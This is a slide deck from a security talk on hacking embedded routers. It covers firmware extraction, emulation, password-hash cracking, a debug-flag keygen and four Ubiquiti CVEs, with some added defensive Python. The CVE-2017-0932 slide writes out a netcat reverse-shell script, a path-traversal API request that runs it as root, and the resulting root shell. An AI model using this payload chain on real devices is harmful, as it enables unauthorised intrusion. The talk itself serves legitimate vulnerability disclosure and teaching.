Internet of Sh*t
Hacking Embedded Devices
Maycon Vitali
maycon at hacknroll dot com
Agenda
• Who Am I?
• General Overview
• Toolset
• Firmware Extraction
• Serial Interface
• Reverse Engineering
• UBNT Findings – CVE-2017-093[2-5]
• Conclusion
Who am I?
• Senior Security Consultant @ SpiderLabs
• Security Researcher @ Hack N’ Roll
• Main duties:
• Web Application Pentest
• Network Pentest
• Mobile Application Pentest (SL-TT)
• ATM Pentest
• Embedded Devices Pentest
General Overview
• Used by 64% of organizations
• Present in almost 100% of all residences.
• [g]old architecture design.
• Operating system with almost no protection (80s-style exploitation)
• Security isn’t a “MUST DO” for developers.
• Common weaknesses.
Toolset
Main Toolset
• Reversing
• radare2
• Firmware Extraction (SPI)
• SOIC Clip
• BusPirate / Raspberry Pi
• flashrom
• Debugging
• qemu-user
• gdb (target arch)
• gcc-multilib
• gef
Firmware Extraction
• Vendor download page
• Network sniffing (firmware upgrade)
• SPI extraction
SPI Extraction
Target
ZHAL> ATSH
FW Version : V1.13(WUK.0)b6
External Version : BR_SO_V1.13(WUK.0)b6
Bootbase Version : V1.10 | 01/18/2016
Vendor Name : MitraStar Technology Corp.
Product Model : DSL-100HN-T1-NV
Serial Number : ACC6629493C0
First MAC Address : ACC6629493C0
Last MAC Address : ACC6629493C3
MAC Address Quantity : 04
Default Country Code : D0
Boot Module Debug Flag : 00
Kernel Checksum : d831a525
RootFS Checksum : a4b2b045
RomFile Checksum : daa5645d
Main Feature Bits : 00
SPI Pinout
• CS – Chip Select
• SI – Serial In
• SO – Serial Out
• SCLK – Clock
• RESET# – Reset (not used)
• VCC – Power supply
• GND – Ground
MX25L12835F Datasheet
BusPirate
Using flashrom
[maycon@DayOfDevil ~]$ flashrom \
>   -p buspirate_spi:dev=/dev/buspirate,spispeed=1M \
>   -c "MX25L12835F/MX25L12845E/MX25L12865E" \
>   -r flash.dump
flashrom v0.9.9-r1955 on Linux 4.14.7-1-ARCH (x86_64)
flashrom is free software, get the code at https://flashrom.org
Calibrating delay loop... OK.
Found Macronix flash chip "MX25L12835F/MX25L12845E/MX25L12865E" (16384 kB, SPI)
on buspirate_spi
Reading flash... done
Using binwalk
• -e means [e]xtract files
[maycon@DayOfDevil ~]$ binwalk -e flash.dump
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
26112 0x6600 LZMA compressed data, properties: 0x5D, ...
69600 0x10FE0 LZMA compressed data, properties: 0x5D, ...
197120 0x30200 LZMA compressed data, properties: 0x5D, ...
1372293 0x14F085 Squashfs filesystem, little endian, version 4.0, ...
8389120 0x800200 LZMA compressed data, properties: 0x5D, ...
9564293 0x91F085 Squashfs filesystem, little endian, version 4.0, ...
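The binwalk listing above is the result of signature scanning: the tool walks the dump looking for known headers and sanity-checks the fields behind each magic before reporting a hit. The following Python is an added illustration of that idea and is not the author's code or part of binwalk; it recognises only two of the signatures seen in the slide (an LZMA stream header, properties byte 0x5D, and a Squashfs v4 superblock), applies the field checks that keep a stray 0x5D byte from being reported, and runs on a constructed 8 KiB sample dump rather than the slide's flash.dump.

```python
import struct

LZMA_UNKNOWN_SIZE = 0xFFFFFFFFFFFFFFFF


def _lzma_header(buf: bytes, off: int):
    """Return a description if an LZMA 'alone' header starts at off, else None."""
    if off + 13 > len(buf) or buf[off] != 0x5D:  # props 0x5D = lc=3, lp=0, pb=2
        return None
    dict_size, usize = struct.unpack_from("<IQ", buf, off + 1)
    # Sanity checks: a real encoder writes a power-of-two dictionary >= 4 KiB,
    # and the uncompressed size is either "unknown" or a plausible 32-bit value.
    if dict_size < 4096 or dict_size & (dict_size - 1):
        return None
    if usize != LZMA_UNKNOWN_SIZE and not 0 < usize < (1 << 32):
        return None
    size = "unknown" if usize == LZMA_UNKNOWN_SIZE else str(usize)
    return (f"LZMA compressed data, properties: 0x5D, dictionary size: {dict_size}, "
            f"uncompressed size: {size}")


def _squashfs_header(buf: bytes, off: int):
    """Return a description if a Squashfs v4 superblock starts at off, else None."""
    magic = buf[off:off + 4]
    if magic == b"hsqs":
        endian, name = "<", "little endian"
    elif magic == b"sqsh":
        endian, name = ">", "big endian"
    else:
        return None
    if off + 32 > len(buf):
        return None
    # s_major / s_minor live at superblock offsets 28 and 30.
    major, minor = struct.unpack_from(endian + "HH", buf, off + 28)
    if major != 4:  # only v4.x superblocks are recognised here
        return None
    return f"Squashfs filesystem, {name}, version {major}.{minor}"


def _candidates(buf: bytes, needle: bytes):
    """Yield every offset at which needle occurs (cheap pre-filter before parsing)."""
    off = buf.find(needle)
    while off != -1:
        yield off
        off = buf.find(needle, off + 1)


def scan(buf: bytes):
    """Return a sorted list of (offset, description) for recognised signatures."""
    hits = []
    for off in _candidates(buf, b"\x5d"):
        desc = _lzma_header(buf, off)
        if desc:
            hits.append((off, desc))
    for magic in (b"hsqs", b"sqsh"):
        for off in _candidates(buf, magic):
            desc = _squashfs_header(buf, off)
            if desc:
                hits.append((off, desc))
    return sorted(hits)


def build_sample_dump() -> bytes:
    """Constructed sample (not the slide's flash.dump) with headers at known offsets."""
    dump = bytearray(b"\xff" * 0x2000)
    # Decoy: a 0x5D byte followed by a dictionary size that is not a power of two.
    dump[0x300:0x300 + 13] = b"\x5d" + struct.pack("<IQ", 12345, 100)
    # Real-looking LZMA header: 8 MiB dictionary, unknown uncompressed size.
    dump[0x600:0x600 + 13] = b"\x5d" + struct.pack("<IQ", 1 << 23, LZMA_UNKNOWN_SIZE)
    # Squashfs 4.0 superblock, little endian, gzip (compression id 1), 128 KiB blocks.
    sb = struct.pack("<4sIIIIHHHHHH", b"hsqs", 42, 0, 131072, 3, 1, 17, 0xC0, 1, 4, 0)
    dump[0x1000:0x1000 + len(sb)] = sb
    return bytes(dump)


if __name__ == "__main__":
    print(f"{'DECIMAL':<10}{'HEXADECIMAL':<14}DESCRIPTION")
    print("-" * 80)
    for off, desc in scan(build_sample_dump()):
        print(f"{off:<10}{hex(off):<14}{desc}")
```

The decoy at 0x300 is the reason the field checks matter: on a 16 MB dump the byte 0x5D occurs tens of thousands of times, and without the dictionary and size checks every one of them would be reported.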
Binary Emulation
[maycon@DayOfDevil squashfs-root]$ file bin/ls
bin/ls: symbolic link to busybox
[maycon@DayOfDevil squashfs-root]$ file bin/busybox
bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically
linked, interpreter /lib/ld-uClibc.so.0, stripped
[maycon@DayOfDevil squashfs-root]$ cp $(which qemu-mips-static) .
[maycon@DayOfDevil squashfs-root]$ ls -la qemu-mips-static
-rwxr-xr-x 1 maycon users 3289936 Feb 19 03:47 qemu-mips-static
[maycon@DayOfDevil squashfs-root]$ sudo chroot . ./qemu-mips-static bin/ls
bin etc proc sys usr
boaroot lib qemu-mips-static tmp var
dev linuxrc sbin userfs
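The emulation step above depends on two facts that `file` reports: the target architecture and endianness (which decide that qemu-mips-static, rather than qemu-mipsel-static or qemu-arm-static, is the right user-mode emulator) and the interpreter path /lib/ld-uClibc.so.0 (which is why the binary is run inside a chroot of the extracted rootfs, where that loader exists). The following Python is an added example, not the author's tooling and not `file` itself: it reads those fields straight from the ELF header and the PT_INTERP program header, and maps them to the qemu-user binary name. The sample ELF it builds is a constructed 32-bit big-endian MIPS header with a single PT_INTERP entry, not busybox from the slide.

```python
import struct
import sys

PT_INTERP = 3
EM_NAMES = {3: "Intel 80386", 8: "MIPS", 20: "PowerPC", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def _qemu_name(e_machine: int, bits: int, little: bool):
    """Map (machine, class, endianness) to the qemu-user static binary name."""
    if e_machine == 8:  # MIPS comes in four flavours
        return "qemu-mips" + ("64" if bits == 64 else "") + ("el" if little else "") + "-static"
    if e_machine == 40:
        return "qemu-arm-static" if little else "qemu-armeb-static"
    names = {3: "i386", 20: "ppc", 62: "x86_64", 183: "aarch64"}
    return f"qemu-{names[e_machine]}-static" if e_machine in names else None


def describe_elf(buf: bytes) -> dict:
    """Parse the ELF header (and PT_INTERP, if any) and pick the qemu-user emulator."""
    if buf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    bits = {1: 32, 2: 64}[buf[4]]          # EI_CLASS
    little = buf[5] == 1                   # EI_DATA: 1 = LSB, 2 = MSB
    e = "<" if little else ">"
    e_type, e_machine = struct.unpack_from(e + "HH", buf, 16)
    if bits == 32:
        e_phoff, = struct.unpack_from(e + "I", buf, 28)
        e_phentsize, e_phnum = struct.unpack_from(e + "HH", buf, 42)
    else:
        e_phoff, = struct.unpack_from(e + "Q", buf, 32)
        e_phentsize, e_phnum = struct.unpack_from(e + "HH", buf, 54)

    interp = None
    for i in range(e_phnum):
        ph = e_phoff + i * e_phentsize
        p_type, = struct.unpack_from(e + "I", buf, ph)
        if p_type != PT_INTERP:
            continue
        if bits == 32:
            p_offset, = struct.unpack_from(e + "I", buf, ph + 4)
            p_filesz, = struct.unpack_from(e + "I", buf, ph + 16)
        else:
            p_offset, = struct.unpack_from(e + "Q", buf, ph + 8)
            p_filesz, = struct.unpack_from(e + "Q", buf, ph + 32)
        interp = buf[p_offset:p_offset + p_filesz].rstrip(b"\0").decode()
        break

    return {
        "bits": bits,
        "endian": "little" if little else "big",
        "type": {2: "EXEC", 3: "DYN"}.get(e_type, f"type {e_type}"),
        "machine": EM_NAMES.get(e_machine, f"unknown ({e_machine})"),
        "interp": interp,                      # None means statically linked
        "qemu": _qemu_name(e_machine, bits, little),
    }


def build_sample_elf() -> bytes:
    """Constructed ELF32 MSB MIPS executable header plus one PT_INTERP header."""
    interp = b"/lib/ld-uClibc.so.0\0"
    ehdr = struct.pack(">4sBBBB8xHHIIIIIHHHHHH", b"\x7fELF", 1, 2, 1, 0,
                       2, 8, 1, 0x400000, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack(">IIIIIIII", PT_INTERP, 84, 0, 0, len(interp), len(interp), 4, 1)
    return ehdr + phdr + interp            # interpreter string lands at offset 84


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf()
    info = describe_elf(data)
    print(info)
    if info["interp"]:
        print(f"dynamic binary: run it from the extracted rootfs, e.g. "
              f"sudo chroot . ./{info['qemu']} <path-inside-rootfs>")
```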
Serial Interface
UART Interface
Reverse Engineering
# cat > /etc/passwd
support:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/cmdsh
admin:$1$$C1ky1AR55g1vIlMrcvBNM1:0:0:root:/:/bin/sh
$ ./john ./_flash.dump.extracted/squashfs-root/usr/etc/passwd
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234 (admin)
1g 0:00:00:00 DONE 2/3 (2017-12-21 20:46) 4.545g/s 24818p/s 24818c/s 24818C/s 123456..larry
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Reverse
Engineering
• puts(“Password incorrect !”);
• system(…)
• strcmp(…, “18vudl1b.4”);
Bootloader
ATEN Keygen
Reversing the ATEN algorithm
[maycon@DayOfDevil Vivo]$ ./aten_bypass C6629493C0
To enable DebugFlag:
ZHAL> ATEN 1,10F0A563
To disable DebugFlag:
ZHAL> ATEN 0,10F0A563
UBNT Findings
CVE-2017-0935 – Privilege Escalation with Session Hijacking
operator@ubnt:~$ df -h
Filesystem Size Used Available Use% Mounted on
ubi0_0 214.9M 144.4M 65.8M 69% /root.dev
aufs 214.9M 144.4M 65.8M 69% /
devtmpfs 124.4M 0 124.4M 0% /dev
tmpfs 124.5M 56.0K 124.4M 0% /run
tmpfs 124.5M 56.0K 124.4M 0% /run
tmpfs 124.5M 52.0K 124.4M 0% /var/log
tmpfs 124.5M 0 124.5M 0% /tmp
none 124.5M 112.0K 124.4M 0% /opt/vyatta/config
operator@ubnt:~$
CVE-2017-0935 – Privilege Escalation with Session Hijacking
operator@ubnt:~$ df -h
Filesystem Size Used Available Use% Mounted on
ubi0_0 214.9M 144.4M 65.8M 69% /root.dev
aufs 214.9M 144.4M 65.8M 69% /
devtmpfs 124.4M 0 124.4M 0% /dev
tmpfs 124.5M 60.0K 124.4M 0% /run
tmpfs 124.5M 60.0K 124.4M 0% /run
tmpfs 124.5M 52.0K 124.4M 0% /var/log
tmpfs 124.5M 0 124.5M 0% /tmp
none 124.5M 112.0K 124.4M 0% /opt/vyatta/config
unionfs 124.5M 0 124.5M 0% /opt/vyatta/config/tmp/new_config_g73ik18gms70ciap15in0mttpt0vk81b
operator@ubnt:~$
CVE-2017-0934 – Privilege Escalation with Session Hijacking
total 0
drwxrwxrwt 4 root root 300 Jan 1 00:07 .
drwxr-xr-x 31 root root 760 Jan 1 00:00 ..
srwxr-x--- 1 root root 0 Jan 1 00:00 .imi_line
srw-rw---- 1 root root 0 Jan 1 00:00 .imi_show
srw-rw---- 1 root root 0 Jan 1 00:00 .nsm_show
srwxr-x--- 1 root root 0 Jan 1 00:00 .nsmserv
srwxr-x--- 1 root root 0 Jan 1 00:00 .rib_serv
srw-rw---- 1 root root 0 Jan 1 00:00 .rib_show
drwxrwxr-x 2 root vyattacf 60 Jan 1 00:07 changes_only_9ckaihkfskhjt4q7t7d52c87tfvnbioi
drwxr-x--- 2 root root 40 Jan 1 00:00 ifp
srwxrwx--- 1 root vyattacf 0 Jan 1 00:00 ubnt.socket.cfgd
srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.cli
srw-rw---- 1 root users 0 Jan 1 00:00 ubnt.socket.platd
srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.statsd
srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.sysd
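The listing above is shown on the slide without commentary. What an auditor looks for in it is the set of Unix sockets owned by root whose mode grants write access to a non-root group (vyattacf, www-data, users): every process running under one of those groups, the web server's account included, can connect to the root daemon behind the socket. The following Python is an added example, not the author's code; it parses `ls -la` output and flags exactly those sockets. The input is the slide's own listing, re-joined where the extraction split one entry over two lines.

```python
# Listing taken from the slide (CVE-2017-0934). Treated here as sample input.
LISTING = """\
total 0
drwxrwxrwt 4 root root 300 Jan 1 00:07 .
drwxr-xr-x 31 root root 760 Jan 1 00:00 ..
srwxr-x--- 1 root root 0 Jan 1 00:00 .imi_line
srw-rw---- 1 root root 0 Jan 1 00:00 .imi_show
srw-rw---- 1 root root 0 Jan 1 00:00 .nsm_show
srwxr-x--- 1 root root 0 Jan 1 00:00 .nsmserv
srwxr-x--- 1 root root 0 Jan 1 00:00 .rib_serv
srw-rw---- 1 root root 0 Jan 1 00:00 .rib_show
drwxrwxr-x 2 root vyattacf 60 Jan 1 00:07 changes_only_9ckaihkfskhjt4q7t7d52c87tfvnbioi
drwxr-x--- 2 root root 40 Jan 1 00:00 ifp
srwxrwx--- 1 root vyattacf 0 Jan 1 00:00 ubnt.socket.cfgd
srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.cli
srw-rw---- 1 root users 0 Jan 1 00:00 ubnt.socket.platd
srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.statsd
srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.sysd
"""


def parse_ls_line(line: str):
    """Split one `ls -la` line into its fields; return None for 'total N' and junk."""
    parts = line.split(None, 8)
    if len(parts) < 9:
        return None
    perms, _links, owner, group, _size, _month, _day, _time, name = parts
    return {"perms": perms, "owner": owner, "group": group, "name": name}


def audit_sockets(listing: str, trusted_groups=("root",)):
    """Return [(name, group, reason)] for sockets writable by an untrusted group or by everyone.

    Mode string positions: [0] type, [1:4] owner rwx, [4:7] group rwx, [7:10] other rwx.
    """
    findings = []
    for line in listing.splitlines():
        entry = parse_ls_line(line)
        if entry is None or entry["perms"][0] != "s":   # 's' = Unix domain socket
            continue
        perms = entry["perms"]
        if perms[8] == "w":
            findings.append((entry["name"], entry["group"], "world-writable"))
        elif perms[5] == "w" and entry["group"] not in trusted_groups:
            findings.append((entry["name"], entry["group"],
                             f"writable by group {entry['group']}"))
    return findings


if __name__ == "__main__":
    for name, group, reason in audit_sockets(LISTING):
        print(f"{name:<22} {group:<10} {reason}")
```

The same function run over a live `ls -la /run` (or wherever the daemons place their sockets) gives a quick regression check after a firmware update: the fix for a finding like this is usually a tighter mode or a dedicated group rather than a code change, and both are visible in the listing.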
CVE-2017-0933 – CSRF Bypassing “Referer:” Whitelisting Protection
$ ls -la fake_www/
total 16
drwxr-xr-x 2 hnrteam users 4096 jun 15 02:08 .
drwxr-xr-x 7 hnrteam users 4096 jun 15 02:03 ..
-rw-r--r-- 1 hnrteam users 3847 jun 15 02:05 index.html
-rw-r--r-- 1 hnrteam users 232 jun 15 02:03 lighttpd.conf
The content of lighttpd.conf file:
server.document-root = "/home/operator/fake_www"
server.port = 3000
mimetype.assign = (
".html" => "text/html",
)
index-file.names = ( "index.html" )
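The slide makes the point by configuration alone: a second web server on the device's own address (port 3000, document root under the operator's home) produces a Referer that contains the whitelisted host, so a host-only Referer check passes. The Python below is an added example, not the author's code or Ubiquiti's; it puts the weak check beside the two defences that close the gap: a strict origin comparison (scheme, host and port, preferring the Origin header) and a per-session CSRF token compared in constant time. The header dictionaries are constructed: the first mirrors the request shown on the slide, the second is what a browser would send from a page served by the lighttpd instance above.

```python
import hmac
import secrets
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def referer_allowed_naive(referer, device_host):
    """The weak pattern: any Referer that mentions the device's address passes,
    whatever the scheme or port it was served on."""
    return referer is not None and device_host in referer


def same_origin(url, scheme, host, port=None):
    """Strict comparison of (scheme, host, port), filling in default ports."""
    parts = urlsplit(url)
    if parts.scheme not in DEFAULT_PORTS or parts.hostname is None:
        return False
    got = (parts.scheme, parts.hostname, parts.port or DEFAULT_PORTS[parts.scheme])
    want = (scheme, host, port or DEFAULT_PORTS[scheme])
    return got == want


def source_allowed(headers, scheme, host, port=None):
    """Prefer Origin (browsers send it on cross-site POSTs); fall back to Referer.
    A request carrying neither is rejected rather than waved through."""
    source = headers.get("Origin") or headers.get("Referer")
    return bool(source) and same_origin(source, scheme, host, port)


def new_csrf_token():
    """Per-session secret to embed in forms / JS; an attacker's page cannot read it."""
    return secrets.token_urlsafe(32)


def token_valid(session_token, submitted_token):
    if not session_token or not submitted_token:
        return False
    return hmac.compare_digest(session_token, submitted_token)


def state_change_allowed(headers, session_token, submitted_token, scheme, host, port=None):
    """Both layers must pass for a state-changing request."""
    return (source_allowed(headers, scheme, host, port)
            and token_valid(session_token, submitted_token))


# Constructed sample headers (see lead-in).
LEGIT_HEADERS = {"Host": "192.168.2.1", "Referer": "https://192.168.2.1/"}
FAKE_WWW_HEADERS = {"Host": "192.168.2.1", "Referer": "http://192.168.2.1:3000/index.html"}

if __name__ == "__main__":
    for label, h in (("legit", LEGIT_HEADERS), ("fake_www", FAKE_WWW_HEADERS)):
        print(f"{label:<9} naive={referer_allowed_naive(h['Referer'], '192.168.2.1')} "
              f"strict={source_allowed(h, 'https', '192.168.2.1')}")
```

Even the strict origin check is a secondary control: browsers may strip Referer under some privacy policies, and same-origin content (a stored XSS, or an attacker who can serve files from the device as here) defeats any origin-based check. The token is the primary defence; the origin comparison is there to fail closed when the token layer is missing.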
CVE-2017-0932 – Privilege Escalation using API->Feature
$ cat Backdoor/wizard-run
#!/bin/bash
/usr/bin/nc 192.168.2.2:1337 -e /bin/bash &
POST /api/edge/feature.json HTTP/1.1
Host: 192.168.2.1
Referer: https://192.168.2.1/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 90
Cookie: PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7
Connection: close
{"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load","input":"id"}}
$ nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from 192.168.2.1 44440 received!
id
uid=0(root) gid=102(vyattacfg)
uname -a
Linux ubnt 3.10.14-UBNT #1 SMP Sat Apr 22 06:38:07 PDT 2017 mips GNU/Linux
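The request above works because the "scenario" value is treated as a path fragment: the "../" segments walk out of the directory the wizards live in, and the API then runs a wizard-run script the caller placed elsewhere, as root. The Python below is an added example, not the author's code or Ubiquiti's; the base directory and the fact that the script is named wizard-run are taken from the slide, the resolver functions are hypothetical. It shows the unsafe join beside a hardened resolver that allowlists the name, canonicalises the result and confirms it still lies under the base, and it exercises both in a temporary directory so the traversal and a symlink-based escape can be checked without touching a real device.

```python
import os
import re
import tempfile

# A scenario is a directory name: letters, digits, '_' and '-', nothing else.
SCENARIO_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]*")


def resolve_scenario_unsafe(base_dir, scenario):
    """The pattern behind the finding: the caller's value is joined straight onto the
    base directory, so '../' segments walk out of it."""
    return os.path.join(base_dir, scenario, "wizard-run")


def resolve_scenario(base_dir, scenario):
    """Hardened resolver: allowlist the name, then verify the canonical path stays inside base."""
    if not SCENARIO_NAME.fullmatch(scenario):
        raise ValueError(f"invalid scenario name: {scenario!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, scenario))
    # Defence in depth: a valid-looking name can still be a symlink pointing elsewhere.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"scenario {scenario!r} resolves outside {base}")
    return os.path.join(target, "wizard-run")


def is_safe_scenario(base_dir, scenario):
    try:
        resolve_scenario(base_dir, scenario)
        return True
    except ValueError:
        return False


def check_examples():
    """Build a throwaway layout (wizards/setup plus a 'Backdoor' dir outside it) and
    report how the unsafe and hardened resolvers behave. Returns a dict of booleans."""
    with tempfile.TemporaryDirectory() as tmp:
        tmp = os.path.realpath(tmp)
        base = os.path.join(tmp, "wizards")
        os.makedirs(os.path.join(base, "setup"))
        outside = os.path.join(tmp, "home", "operator", "Backdoor")
        os.makedirs(outside)
        os.symlink(outside, os.path.join(base, "evil"))   # name passes the regex
        traversal = "../home/operator/Backdoor"

        unsafe = os.path.realpath(resolve_scenario_unsafe(base, traversal))
        return {
            "unsafe_lands_outside_base": os.path.commonpath([base, unsafe]) != base,
            "unsafe_points_at_backdoor": unsafe == os.path.join(outside, "wizard-run"),
            "safe_rejects_traversal": not is_safe_scenario(base, traversal),
            "safe_rejects_symlink_escape": not is_safe_scenario(base, "evil"),
            "safe_accepts_valid": resolve_scenario(base, "setup")
                                  == os.path.join(base, "setup", "wizard-run"),
        }


if __name__ == "__main__":
    for name, ok in check_examples().items():
        print(f"{name:<30} {ok}")
```

The allowlist alone would have stopped the request on the slide; the canonical-path check is what also stops the cases an allowlist cannot see, such as a scenario directory that is itself a symlink out of the tree.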
Questions?
